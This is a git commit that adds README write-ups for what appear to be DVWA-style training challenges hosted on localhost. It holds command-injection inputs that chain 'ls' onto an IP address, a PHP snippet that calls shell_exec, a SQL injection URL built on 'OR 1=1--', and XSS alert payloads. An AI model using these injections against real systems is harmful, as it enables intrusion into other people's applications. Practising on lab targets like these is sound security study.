docs: 📝 Update readme with description of the challenge

This commit is contained in:
Louis Gallet 2023-12-22 09:35:51 +01:00
parent ee54d76769
commit afaae6aad0
Signed by: lgallet
GPG Key ID: 84D3DF1528A84511
5 changed files with 17 additions and 1 deletions

View File

@ -1,10 +1,14 @@
# Command Injection
The aim of this challenge is to inject a command to the server that execute a script.
# Low
```bash
127.0.0.1 && ls
```
# Medium
> In progress
```bash
127.0.0.1 & ls
```
# High
> In progress

View File

@ -0,0 +1,4 @@
<?php
$output = shell_exec('ls');
echo "<pre>$output</pre>";
?>

View File

@ -1,3 +1,6 @@
# SQL Injection
The aim of this challenge is to inject a SQL command to the server that execute a script.
# Low
Full url : http://localhost:4280/vulnerabilities/sqli/?id=test%27+OR+1=1--%27&Submit=Submit#

View File

@ -1,3 +1,6 @@
# XSS (DOM)
The aim of this challenge is to inject a script to the server that execute a script.
# Low
Full URL : [http://localhost:4280/vulnerabilities/xss_d/?default=French<script>alert("Hello hacker")</script>]()

View File

@ -1,3 +1,5 @@
# Stored XSS
The aim of this challenge is to inject a script to the server that execute a script.
# Low
```javascript
<script>alert("XSS");</script>